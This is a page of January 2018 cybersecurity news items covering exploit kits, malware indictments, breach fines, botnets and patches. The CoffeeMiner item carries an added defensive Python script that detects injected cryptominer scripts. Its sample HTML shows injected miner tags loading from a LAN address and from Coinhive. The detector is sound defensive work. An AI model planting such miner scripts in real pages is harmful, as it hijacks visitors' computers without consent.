Info Security


RIG EK Activity Declines in Q4

Thu, 01/11/2018 - 20:09

The RIG exploit kit (EK) has hung onto its lead as the most active EK out there this quarter, even though overall volume of RIG traffic was down from Q3.

According to the latest stats from Zscaler, RIG, which took the lion’s share of the activity after the demise of the Angler and Neutrino EKs, declined significantly in November and December, even though it continues to install ransomware, banking Trojans and cryptocurrency mining software on vulnerable systems at a greater rate than the competition.

Global distribution of RIG activity has also shifted, the firm said in its report: “For the last quarter, virtually all observed RIG traffic has been within the United States, Russia and Japan. This was unexpected, as previous analyses had shown an appreciable amount of activity in Europe, the rest of the Americas, and Southeast Asia.”

Among the concurrent RIG campaigns this year, the “Seamless” campaign, primarily responsible for infecting victims with the Ramnit banking infostealer, has been ongoing since early last year. RIG is also distributing coin-mining packages that typically mine alternative cryptocurrencies such as Monero, which place a greater emphasis on privacy and anonymity than Bitcoin. However, earlier this fall Zscaler researchers observed a one-off RIG campaign that used a different malicious redirect structure and infected victims with the Dofoil Trojan and the Bitcoin Miner mining tool.

Other active exploit kits in the quarter include the Terror EK, a more recent exploit kit discovered in late 2016. It was formed as an amalgamation of several active exploit kits, including the Sundown EK. The majority of detected Terror EK cycles in the fourth quarter were delivered via malvertising campaigns using the Propeller Ads network.

Disdain EK, a brand-new exploit kit that shares code with Terror EK and uses the same URL pattern, was also discovered making the rounds.

“Disdain is currently operating at very low activity, but has been observed distributing the Kasidet infostealer,” Zscaler said.

Also, the venerable Magnitude EK is still kicking. One of the longest-running exploit kits, first launched in 2013, Magnitude has seen much lower volume in recent years and now primarily targets Southeast Asian countries and South Korea with malvertising campaigns.

Despite the decrease in activity, the danger is still very real and present.

“Exploit kits pose a significant threat to users during simple web browsing,” Zscaler noted. “In the case of ransomware infections, the result could be the inability of a user to access his or her files. The techniques exploit kit authors use to hide their activities are frequently changing, and security researchers work hard to analyze and block these new threats.”

To help avoid infections such as these, users should always block untrusted third-party scripts and resources, and avoid clicking on suspicious advertisements.

Categories: Cyber Risk News

Mueller Appoints Cyber Expert to Trump Probe Team

Thu, 01/11/2018 - 12:03

The high-profile investigation into possible collusion between the Trump election campaign team and the Russian government has been given added weight by the appointment of a prosecutor well versed in cybersecurity, it has emerged.

Ryan Dickey was actually appointed by special counsel Robert Mueller in early November, joining the growing 16-strong team from the Department of Justice’s Computer Crime and Intellectual Property Section.

Dickey joins a team well-versed in public corruption, money laundering and fraud, but his expertise in cybercrime signals the growing importance of this strand of the investigation.

He’s participated in several high-profile cyber-cases including one against controversial file-sharing site Megaupload, and the investigation of notorious Romanian hacker Guccifer, who was finally arrested in 2014.

It was this investigation that revealed that Hillary Clinton had been using a private email server for official business when secretary of state – a fact not lost on the Russian authorities. The online moniker “Guccifer 2.0” was given to the ‘individual’ who leaked damaging Democratic Party emails ahead of the 2016 presidential election.

US intelligence believes this was the work of Russian intelligence. The job now ahead of Mueller and his team is proving the Trump team colluded with Moscow to influence the election.

In many ways, it’s surprising that a cybersecurity expert has up until now not been appointed to the investigation, given the importance of this strand of the inquiry.

It’s still unclear what the outcome will be, although legal experts have told the Washington Post that prosecutors could pursue a charge of conspiracy to violate the Computer Fraud and Abuse Act, if they can prove collusion in the Guccifer 2.0 operation to influence the election result.

For his part, President Trump has continually protested his innocence, describing the investigation as “the single greatest Witch Hunt in American history,” while Republican lawmakers have begun to grumble that Mueller’s team is filled with Democrat-leaning lawyers.

Categories: Cyber Risk News

Cyber Security Challenge UK Appoints New CEO

Thu, 01/11/2018 - 11:53

Cyber Security Challenge UK today announced the appointment of a new chief executive following the death of former CEO Stephanie Daman, who passed away in June last year after a long battle with cancer.

Colin Lobley, who came through a thorough selection process of over 70 candidates, will now take up the role, joining from the Security Services division of DXC Technology (formerly Hewlett Packard Enterprise), where he was general manager for the UK, Ireland and the Middle East. Lobley will bring with him expertise in working with both public and private sector organizations.

“There are lots of exciting possibilities to diversify and expand this national initiative, so we can enhance the positive impact we have on the UK’s cyber resilience,” he said. “It would be fantastic if we could achieve such a utopian vision as having eradicated all security weaknesses in the cyber world...but realistically, if I go home every day knowing I have done something, directly or indirectly, to encourage people into the field of cyber, to enhance the knowledge of those in or entering the field, or to educate someone about cybersecurity and start to close those gaps; I'll be happy.”

“That’s exactly why I am delighted to be joining the fantastic, passionate team at Cyber Security Challenge UK,” Lobley added, “helping to make a real difference and building upon the wonderful efforts of the late Stephanie Daman.”

“I fully believe that the UK cyber industry can go from strength to strength to become ever more prominent on the world stage,” he continued. “But to achieve this, it is essential that we nurture new talent, so we can meet the evolving market demands.”

Dr Robert Nowill, chairman of Cyber Security Challenge UK, said: “With his background, Colin fits the role very well as we forge the way ahead for our organization; developing our offering further whilst scaling up what we do to seek out as much new talent and staying as inclusive as possible. The Board and I also are extremely grateful for the work Nigel Harrison has done as Acting CEO for much of last year. We are pleased that Nigel continues as an Executive Director of The Challenge to help drive this exciting future.”

Categories: Cyber Risk News

Fruitfly Malware Creator Allegedly Spied on Victims for 13 Years

Thu, 01/11/2018 - 10:20

An Ohio computer programmer has been indicted for a 13-year malware campaign during which he stole sensitive personally identifiable information (PII), eavesdropped on conversations and even produced child pornography.

Phillip Durachinsky, 28, of North Royalton, Ohio, is facing 16 counts of Computer Fraud and Abuse Act violations, Wiretap Act violations, production of child pornography and aggravated identity theft.

He’s said to have developed the malware known as Fruitfly, which allowed him to remotely access and control victim machines, although it’s not clear how he installed the malware.

This allegedly allowed him to steal reams of sensitive PII including online credentials, tax records, medical records, photographs, banking records and internet searches.

He’s also accused of taking screenshots, logging keystrokes and recording audio/video via the victim machines’ webcams and microphones.

This allegedly allowed Durachinsky to watch and listen to victims without their knowledge. The malware also alerted him when users typed in words associated with pornography, according to the Department of Justice.

The indictment claims he saved millions of images and kept detailed notes of what he saw.

Durachinsky is not only accused of snooping on home users. The DoJ claimed he also installed Fruitfly on computers in private enterprises, schools, a police department and even the government, including one machine at a subsidiary of the US Department of Energy.

“Durachinsky is alleged to have utilized his sophisticated cyber skills with ill intent, compromising numerous systems and individual computers,” said special agent in charge Stephen Anthony.

“The FBI would like to commend the compromised entities that brought this to the attention of law enforcement authorities. It is this kind of collaboration that has enabled authorities to bring this cyber hacker to justice.”

The case answers many questions raised by security researchers when they first discovered Fruitfly, with some even claiming it could be the work of a nation state.

Categories: Cyber Risk News

Equifax Would Have Paid $1.5bn Under New US Breach Laws

Thu, 01/11/2018 - 09:46

Senators have proposed new legislation which would impose strict liability penalties on credit reporting agencies (CRAs) in the event of a data breach.

The Data Breach Prevention and Compensation Act is designed to make the big CRAs more accountable, following a damaging breach at Equifax last year which affected 145.5m Americans and 700,000 Brits.

The act would establish an Office of Cybersecurity at the regulator, the FTC, which would have responsibility for annual inspections and supervision of security-related issues.

Most notably, it would impose mandatory financial penalties starting at $100 for every customer who has one piece of personally identifiable information (PII) compromised, with $50 per additional piece of PII. Half of the money collected would be used to compensate the victims.

These fines could rise even higher if there’s evidence of inadequate cybersecurity or delayed breach reporting.

Under the new legislation, Equifax would have been forced to pay an estimated $1.5bn fine following its September 2017 breach, according to senator Elizabeth Warren.

"The financial incentives here are all out of whack – Equifax allowed personal data on more than half the adults in the country to get stolen, and its legal liability is so limited that it may end up making money off the breach," she said in a statement.

"Our bill imposes massive and mandatory penalties for data breaches at companies like Equifax – and provides robust compensation for affected consumers – which will put money back into people’s pockets and help stop these kinds of breaches from happening again."

Although the US led the way globally with mandatory breach reporting laws a few years back, it is the EU GDPR which now sets the standard. Under the new data protection regulation, Equifax would likely have seen significant fines, due to the number of UK consumers affected.

Consumer and security groups appear to support the legislation.

“This bill establishes much-needed protections for data security for the credit bureaus,” said National Consumer Law Center staff attorney, Chi Chi Wu.

“It also imposes real and meaningful penalties when credit bureaus, entrusted with our most sensitive financial information, break that trust.”

Categories: Cyber Risk News

Bad Botnet Growth Skyrockets in 2017

Wed, 01/10/2018 - 19:00

Bad bots are big – and getting bigger. There was a 37% increase in botnet command-and-control (C&C) listings in 2017, with the majority (68%) of them being hosted on servers run by threat actors.

According to the Spamhaus Botnet Threat Report 2017, the company’s malware division identified and issued Spamhaus Block List (SBL) listings for more than 9,500 botnet C&C servers on 1,122 different networks. In 2017, nearly every seventh SBL listing that Spamhaus issued was for a botnet controller.

Of course, not all botnets are bad bots; but Spamhaus's Botnet Controller List (BCL), which exclusively lists IP addresses of botnet servers set up and operated by cybercriminals, saw listings increase by more than 40% in one year (and more than 90% since 2014). On average, Spamhaus is issuing between 600 and 700 BCL listings per month.

The reality of the situation is probably much worse: The statistics exclude botnet controllers that are hosted on anonymization networks like Tor.

Botnet C&C controllers are used by cybercriminals to send out spam and ransomware, launch distributed denial of service (DDoS) attacks, commit e-banking fraud or click fraud, or mine cryptocurrencies such as Bitcoin and Monero. With the rise of enslaved internet of things (IoT) devices, such as smart thermostats, webcams or network attached storage (NAS) devices, the range of controllers has continued to get more diverse, and more numerous.

In fact, the number of IoT botnet controllers alone more than doubled from 393 in 2016 to 943 in 2017.

“Looking forward to 2018, there is no sign that the number of cyber threats will decrease,” Spamhaus noted in its report. “The big increase of IoT threats in 2017 is very likely to continue in 2018. We are sure that securing and protecting IoT devices will be a core topic in 2018.”

This will likely correspond with an uptick in DDoS attacks.

"The latest 2017 threat report from Spamhaus shows a notable uptick in detected botnets, compared to 2016,” said Stephanie Weagle, vice president of marketing at DDoS specialist Corero Network Security, via email. “The increase is no surprise, given the recent trend of leveraging poorly secured IoT devices, and is only set to increase given the increasing sophistication with which devices are being compromised and recruited. Combined with new DDoS attack vectors and techniques, such as the recent appearance of so-called pulse-wave attacks, the risk of being hit by a damaging attack for those not properly protected is higher than ever."

The report also uncovered that, looking at the geographic location of the botnet controllers, the top botnet hosting country is the US, followed by Russia. Also, when it comes to the kinds of malware associated with the botnet controllers, the Pony downloader topped the list, with 1,015 associated C&Cs. Generic IoT malware came in second; and the Loki credential stealer/banking Trojan took third place with 933 C&Cs.

Interestingly, while Locky and TorrentLocker were omnipresent in 2016, these two ransomware families did not make it into the top 20 in 2017. They have been replaced by the Cerber ransomware, which claimed the No. 7 spot, with 293 C&Cs.

Categories: Cyber Risk News

CoffeeMiner Forces Coffee Shop Visitors to Mine for Monero

Wed, 01/10/2018 - 18:30

Surreptitious crypto-mining using unsuspecting victims’ computers has become a rapidly proliferating phenomenon – and now it has collided with coffee shop Wi-Fi hijacking.

A software developer known as Arnau Code has developed a proof-of-concept for a man-in-the-middle (MiTM) attack, for use in coffee shops and other places where legions of students and teleworkers take advantage of free Wi-Fi. It shows how the bad guys can gain access not just to one victim’s CPU resources to mine for virtual currency but to all of the compute power connected to that particular Wi-Fi network, all at once.

“Some weeks ago I read about this Starbucks case where hackers hijacked laptops on the WiFi network to use the devices computing power to mine cryptocurrency, and I thought it might be interesting [to] perform the attack in a different way,” the developer explained in a blog, with the disclaimer that his research is “strictly for academic purposes.”

He added, “The goal of this article is to explain how [the] MITM attack can be done...to inject some JavaScript in the HTML pages, to force all the devices connected to a WiFi network to be mining a cryptocurrency for the attacker.”

Appropriately named CoffeeMiner, the script allows for an autonomous attack on the Wi-Fi network to do just that. It’s the result of a multistep – but not challenging, according to Code – process.

First, CoffeeMiner intercepts the traffic flowing back and forth between the users and the router by setting up a virtual gateway. Then, using the “mitmproxy” software tool, CoffeeMiner injects a line of JavaScript code into the HTML pages that coffee shop denizens are visiting. The code in turn connects to a simple HTTP server running on an attacker machine, which then serves up the Coinhive crypto-miner to victims. Coinhive, which allows visited websites to mine for the Monero cryptocurrency, has gained notoriety, thanks to cybercriminals abusing it.

“CoinHive miner makes sense when [a] user stays on a website for mid- [to] long-term sessions,” the developer said. “So, for example, for a website where the users’ average session is around 40 seconds, it doesn’t make much sense. In our case, as we will inject the crypto miner into each one of the HTML pages that victims request, [we] will have long-term sessions to calculate hashes to mine Monero.”

Once created as a fully formed weapon, CoffeeMiner runs autonomously, as a sort of set-it-and-forget-it moneymaker.

Code also offered suggestions for extending CoffeeMiner’s reach, including using a powerful Wi-Fi antenna, “to reach better all the physical zone,” and adding the “sslstrip” tool so that the injection also works against websites the user requests over HTTPS.
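To show what a defender can look for, here is an added Python heuristic (not code from the CoffeeMiner project or the article) that scans an HTML response for the traits of the injection described above: a script fetched from a private LAN address, from a known miner host such as coinhive.com, or from a third-party host over plain HTTP, plus inline references to the Coinhive object. The sample page, the 192.168.1.20 address and the example.com/example.net hostnames are constructed.

```python
"""Heuristic check for script tags injected into a plaintext HTML page.
Added example, not code from the CoffeeMiner project or the article."""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts known to serve browser-based miners; coinhive.com is the one the
# article names. Extend the set from your own threat intel.
MINER_HOSTS = {"coinhive.com"}


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.srcs, self.inline, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)
            else:
                self._in_script = True

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.inline.append(data.strip())


def _is_private_ip(host):
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        return False  # a hostname, not an IP literal


def find_injected_scripts(html, page_url):
    """Return (reason, evidence) pairs for scripts that look injected.
    Heuristic only: treat findings as triage leads, not verdicts."""
    page_host = urlparse(page_url).hostname
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.srcs:
        url = urlparse(src)
        host = url.hostname
        if host is None:  # relative URL, same origin as the page
            continue
        if host in MINER_HOSTS:
            findings.append(("known-miner-host", src))
        elif _is_private_ip(host):  # served from a box on the same Wi-Fi
            findings.append(("script-from-lan-address", src))
        elif url.scheme == "http" and host != page_host:
            findings.append(("plaintext-third-party-script", src))
    for body in parser.inline:
        if "CoinHive" in body:  # the miner's JavaScript object name
            findings.append(("inline-miner-reference", body[:60]))
    return findings


# Constructed sample: two legitimate scripts, then the kind of tags an
# on-path injector adds. 192.168.1.20 and the hostnames are placeholders.
SAMPLE_HTML = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example.net/lib.js"></script>
</head><body><p>Latest headlines</p>
<script src="http://192.168.1.20:8000/miner.js"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER');</script>
</body></html>"""

if __name__ == "__main__":
    for reason, evidence in find_injected_scripts(SAMPLE_HTML, "http://example.com/news"):
        print(f"{reason:30} {evidence}")
```

The boundary matters: such a proxy can only rewrite responses it can read, i.e. plaintext HTTP, and a site served over HTTPS with HSTS is not downgraded by sslstrip in a browser that has already recorded the HSTS policy.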

As far as protecting oneself against such an attack, which has the potential to slow victim machines down so far as to be virtually unusable, Scott Petry, CEO and co-founder of Authentic8, compared it to taking basic flu-season precautions.

“We don't even touch public doorknobs without a paper towel or a squirt of Purell,” he said via email. “Why on Earth would anyone freely connect to a public Wi-Fi network? There's no surprise in this story – it’s how the internet works. The surprise is that people are still exposing themselves to these exploits. Someday soon we'll look back in shock on how careless we were on the internet.”

Categories: Cyber Risk News

As Cloud Looms, Security Tops IT Resilience Investment

Wed, 01/10/2018 - 17:18
As Cloud Looms, Security Tops IT Resilience Investment

When it comes to investments in IT resilience, cybersecurity initiatives top the to-do list for most IT departments, as cloud leads the way as the No. 1 threat concern.

According to Syncsort’s 2018 State of Resilience report, which surveyed 5,632 IT professionals globally, ongoing, high-profile hacking attacks, data breaches, disruptive natural disasters and escalating storage and data accessibility needs are top concerns for most businesses. Overall, security is the top initiative that most companies will pursue in the next 24 months (49%). The majority of professionals chose virus protection (71%), malware protection (67%), patch management (53%), and intrusion detection and prevention (IDP, 52%) as their top organizational investments in security today.

IT pros see cloud as the top security challenge: The report found that IT leaders are entrusting critical applications to the cloud, but with concerns. About 43% identify it as their top security challenge for the coming year.

“Certainly, the shared resource pools and always-on features of cloud have introduced the possibility of new security breaches – including data loss, weak identity management, insecure APIs, denial of service attacks, account hijacking and advanced persistent attacks, which infiltrate systems over a period of time,” the firm said in the report. 

The second greatest perceived challenge for IT departments is the increasing sophistication of attacks (37%). “Cunning criminals have sharpened their craft, conducting exploratory raids over months, invading systems, hiding their tracks, and deploying malware that can fool customers with bogus messages or extract and steal valuable data – the lifeblood of most companies.”

Ransomware meanwhile appeared as the No. 3 challenge confronting respondents, though Syncsort’s analysis was dubious as to the actual impact: “IT professionals are naturally aware of this phenomenon, as a result of worldwide media coverage. Yet, a considerable majority of professionals in this study had never been attacked by ransomware or were not aware that they had been; a minuscule number had paid to get data back, as mentioned in a subsequent section of this report. It remains to be seen whether ransomware is the flavor of the moment or will be a recurring trend.”

Despite these concerns, internal security audits are infrequent, the report found. Nearly two-thirds of companies perform security audits on their systems, but the most common schedule was to do it on an annual basis (39%). Another 10% of respondents audit every two years or more, which, given an ever-changing IT environment, could expose a company to risk.

The report also found that data sharing is seen as critical but challenging. About half (53%) of companies surveyed have multiple databases and share data to improve business intelligence, largely through scripting (42%), followed by backup/restore/snapshot processes and FTP/SCP/file transfer (38% each). The average company uses two different methods, adding to the complexity. In turn, this bolsters security concerns.

“IT leaders are under immense pressure to provide an enterprise infrastructure that can sustain severe threats and secure vital information while enabling data accessibility and business intelligence,” said Terry Plath, vice president, Global Services, Syncsort. “Business resilience requires the right mix of planning and technology, and this survey did a thorough job of uncovering how businesses are tackling this increasingly complex and multi-faceted challenge.”

Categories: Cyber Risk News

Carphone Warehouse Breach Results in £400K Fine

Wed, 01/10/2018 - 12:04
Carphone Warehouse Breach Results in £400K Fine

The Carphone Warehouse has become the latest UK firm to be slapped with a massive ICO fine after a 2015 data breach compromised the personal information of millions of customers.

The electronics and mobile phone retailer, owned by Dixons Carphone, was fined £400,000 by the ICO after failing to adequately secure its systems. Hackers accessed data on over three million customers including names, addresses, phone numbers, dates of birth and marital status.

Some 18,000 customers had historical payment details accessed, while 1,000 employees had data including names, phone numbers, postcodes and car registrations exposed to the hackers.

The attackers are said to have accessed the data by using valid log-ins for out-of-date WordPress software.

The ICO claimed Carphone Warehouse failed to delete historical data from its records, carry out routine security testing or keep software up-to-date.

“A company as large, well-resourced, and established as Carphone Warehouse should have been actively assessing its data security systems, and ensuring systems were robust and not vulnerable to such attacks,” said information commissioner, Elizabeth Denham, in a statement.

“Carphone Warehouse should be at the top of its game when it comes to cybersecurity, and it is concerning that the systemic failures we found related to rudimentary, commonplace measures.”

She added that companies need to put in place layered security to help mitigate growing online threats.

The firm may have been saved from a bigger fine by taking steps to fix some of the problems identified, and because the data has not yet resulted in any identity fraud.

The fine puts Carphone Warehouse up there with TalkTalk in terms of the largest ever penalties levied.

The ISP was slapped with a £400,000 penalty after a 2015 breach but then received a further £100,000 for a separate issue relating to data access by a third-party supplier.

Carphone Warehouse would most likely have been hit with an even bigger fine had the incident occurred after May 25, when the GDPR comes into force. It will give the ICO and other regulators around Europe the power to fine organizations up to 4% of global annual turnover, or £17m.

Categories: Cyber Risk News

Patch Tuesday: More Work for Admins with 56 Flaws to Fix

Wed, 01/10/2018 - 11:19
Patch Tuesday: More Work for Admins with 56 Flaws to Fix

Microsoft heaped more work on IT administrators this week with a Patch Tuesday update round that will bring the total CVEs addressed in January to 55, including four public disclosures and one zero-day vulnerability.

The zero-day (CVE-2018-0802) is an Office vulnerability which could allow a remote attacker to take control of an affected system.

“The attacker in this case could create a specially crafted file or host specially crafted content on a compromised website or user-contributed content on a website,” explained Ivanti director of product management, Chris Goettl. “A user opening these specially crafted files would allow the exploit to run, giving the attacker equal rights to the system as the current user.”

The issue could also be mitigated by users running with fewer privileges, he said.

A previously unseen public disclosure (CVE-2018-0819) relates to the Mailsploit vulnerability in Outlook for Mac and could apparently allow an attacker to circumvent email anti-spoofing mechanisms like DMARC.

The remaining three public disclosures were published last week and relate to the Meltdown and Spectre chip issues.

The former is fixed with code changes to the kernel and the latter two flaws via firmware updates, so OS and firmware updates must be installed to fully mitigate these attack methods, according to Goettl.

However, admins have been warned to thoroughly test these updates as reports suggest there could be varying degrees of performance degradation, as well as possible BSOD due to compatibility issues with third-party AV tools.

Microsoft has also halted the deployment of patches for some AMD systems after some users reported their devices got into an “unbootable state.”

Qualys director of product management, Jimmy Graham, claimed that after Spectre and Meltdown patches, the focus for workstation environments should be on fixing Outlook vulnerability CVE-2018-0793 and Word flaw CVE-2018-0794.

Also this month, Adobe released a Priority 2 update for Flash Player (APSB18-01), which fixes out-of-bounds read bug CVE-2018-4871.

Apple released iOS 11.2.2 yesterday as well as a macOS High Sierra 10.13.2 update to help mitigate issues relating to the Spectre chip flaws.

Categories: Cyber Risk News

FBI Boss: We Don’t Want Backdoors, but We Do Want Access to Encrypted Devices

Wed, 01/10/2018 - 10:26
FBI Boss: We Don’t Want Backdoors, but We Do Want Access to Encrypted Devices

The FBI has nearly 7800 devices it can’t access because of encryption, according to its director, who repeated calls yesterday for tech providers to find a solution to the issue that doesn’t involve creating backdoors.

In a speech to the International Conference on Cyber Security, Wray claimed the Feds were unable to access 7775 encrypted devices last year — far higher than the 6900 figure touted in October.

He argued this was fast becoming an “urgent public safety issue” which would only get worse over time unless US technology companies engineer a “responsible” solution.

“We’re not looking for a ‘back door’ – which I understand to mean some type of secret, insecure means of access,” he said. “What we’re asking for is the ability to access the device once we’ve obtained a warrant from an independent judge, who has said we have probable cause.”

However, experts have argued that the only way to give the FBI what it’s asking for is indeed engineering a de facto backdoor.

This would put the privacy and security of hundreds of millions of devices potentially at risk if it fell into the wrong hands, and could even be abused by over-reaching law enforcers, whilst putting pressure on providers like Apple to do the same in countries with poor human rights records, the argument goes.

Whilst admitting a possible solution “isn’t so clear-cut,” Wray’s main line of argument was that US companies lead the world in innovation, so they should be able to find a way to allow law enforcers limited access to devices for which they have a warrant, without breaking security for law-abiding users.

He also claimed that US tech firms are already acceding to requests for customer data by foreign governments, although crucially didn’t go as far as to claim firms like Apple had broken their own encryption to do so.

“The FBI supports information security measures, including strong encryption,” said Wray. “But information security programs need to be thoughtfully designed so they don’t undermine the lawful tools we need to keep this country safe.”

The news comes as researchers unveiled a new end-to-end encrypted group chat protocol, dubbed Asynchronous Ratcheting Tree (ART).

Facebook and Oxford University teamed up on the project, which overcomes inadequacies in current solutions where if one member of the group is hacked then all conversations can be accessed.

This latest innovation in encrypted messaging is unlikely to go down well with law enforcers on either side of the Atlantic.

Categories: Cyber Risk News

Reddit Users Lose Bitcoin Tips After Third-Party Breach

Tue, 01/09/2018 - 20:10
Reddit Users Lose Bitcoin Tips After Third-Party Breach

Reddit has confirmed that one of its email providers, Mailgun, has been breached, resulting in the hacks of user profiles and their linked cryptocurrency accounts.

Attackers infiltrated Reddit accounts using password reset emails sent via the third-party vendor. Several Redditors also reported that their Bitcoin Cash tip accounts had been emptied out.

Despite the alarming details, Reddit urged the public to maintain perspective, noting that the attackers “did not have access to either Reddit’s systems or to a Redditor’s email account,” adding that the number of confirmed impacted users is less than 20 so far.

“On 12/31, Reddit received several reports regarding password reset emails that were initiated and completed without the account owners’ requests,” Reddit explained in a post. “We have been working to investigate the issue and coordinating with Mailgun, a third-party vendor we’ve been using to send some of our account emails including password reset emails,” it continued. “A malicious actor targeted Mailgun and gained access to Reddit’s password reset emails….We know this is frustrating as a user, and we have put additional controls in place to help make sure it doesn’t happen again.”

Mailgun, for its part, said that it has identified the attack vector—an employee’s compromised email account—and has patched the issue.

“On January 3, 2018, Mailgun became aware of an incident in which a customer’s API key was compromised and immediately began diagnostics to help determine the cause and the scope of impact,” Mailgun CTO Josh Odom wrote in a post. “We immediately closed the point of access to the unauthorized user and deployed additional technical safeguards to further protect this sensitive portion of our application.”

He added that the attack affected less than 1% of Mailgun’s entire customer base.

Categories: Cyber Risk News
